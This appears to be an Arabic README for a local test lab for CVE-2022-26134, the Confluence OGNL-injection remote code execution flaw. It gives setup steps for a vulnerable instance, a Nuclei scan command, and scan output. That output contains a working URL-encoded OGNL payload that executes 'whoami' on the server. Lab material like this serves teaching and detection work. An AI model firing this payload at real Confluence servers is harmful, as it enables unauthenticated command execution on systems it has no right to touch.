CVE-2022-26134-LAB
يتضمّن Confluence Server وConfluence Data Center ثغرةً كبيرةً في تنفيذ التعليمات البرمجية عن بُعد دون الحاجة إلى مصادقة، تُعرَف باسم CVE-2022-26134، وفقًا لتنبيه أمني أصدرته Atlassian في 2 يونيو 2022. لم تكن الثغرة مُصحَّحة عند نشرها في 2 يونيو، وكان يتم استغلالها في البيئات الحقيقية. اعتبارًا من 3 يونيو، تتوفر كلٌّ من التصحيحات وحلٍّ مؤقت.
هذا المستودع مخصّص للأغراض التجريبية والتعليمية فقط.
المتطلبات
بيئة Confluence المعرضة للثغرة
تشغيل البيئة المعرضة للثغرة
بمجرد بدء التشغيل، يمكنك الوصول إلى خادم Confluence باستخدام عنوان URL التالي:
http://127.0.0.1:8090/
إعداد خادم Confluence
- في أول زيارة للموقع، سيتم توجيهك عبر عملية الإعداد.
- لا تحدد أي خيارات واختر "Next" في صفحة "Get apps".
- في صفحة مفتاح الترخيص، انقر على الرابط الذي يقول "Get an evaluation license".
- ستتم إعادة توجيهك إلى my.atlassian.com. تأكد من أن نوع الترخيص المحدد هو Confluence (Data Center). اكتب أي اسم مؤسسة ترغب به. تأكد من أن زر الاختيار بجوار "Your instance is" محدد على "up and running". بعد التحقق من هذه التفاصيل، انقر على زر "Generate License".
- ستظهر نافذة تأكيد منبثقة تسألك إذا كنت تريد تثبيته على الخادم: 127.0.0.1. اختر "Yes".
- سيؤدي اختيار "Yes" إلى ملء مفتاح الترخيص تلقائيًا في نسختك المحلية من Confluence. اختر "Next".
- اختر نوع النشر "Standalone" ثم اختر "Next".
- في صفحة إعداد قاعدة البيانات، يجب ملء التفاصيل على النحو التالي:
- نوع قاعدة البيانات: PostgreSQL
- نوع الإعداد: Simple
- اسم المضيف: db
- المنفذ: 5432
- اسم قاعدة البيانات: confluence
- اسم المستخدم: confluence
- كلمة المرور: 123456789
- بعد ملء هذه الحقول، اضغط على زر "Test connection". يجب أن تتلقى الرسالة "Success! Database connected successfully". ثم انقر على "Next".
- سيبدأ إعداد قاعدة البيانات. قد يستغرق ذلك بعض الوقت. انتظر قليلًا.
- بمجرد اكتمال إعداد قاعدة البيانات، ستكون في صفحة "Load Content". اختر زر "Example Site".
- بعد ذلك، في صفحة "Configure User Management"، اختر "Manage users and groups with Confluence".
- بعد ذلك، في صفحة "Configure System Administrator Account"، أنشئ حسابًا واختر "Next".
- بمجرد اكتمال العملية، سترى أن الإعداد تم بنجاح. اضغط على "Start".
- سيُطلب منك "Create a space to store your work". أدخل أي اسم مساحة تريده.
- تخطَّ البرنامج التعليمي.
- لقد أكملت الآن إعداد التقييم لخادم Confluence.
اكتشاف CVE-2022-26134
الثغرة هي ثغرة حقن OGNL تؤثر على خادم HTTP. يتم وضع حمولة OGNL في URI الخاص بطلب HTTP. يبدو أن أي نوع من طرق HTTP يعمل، سواء كانت صالحة (GET وPOST وPUT وغيرها) أو غير صالحة (مثل "BALH").
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
استخدام Nuclei
شغّل أمر Nuclei التالي:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
مخرجات الفحص
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]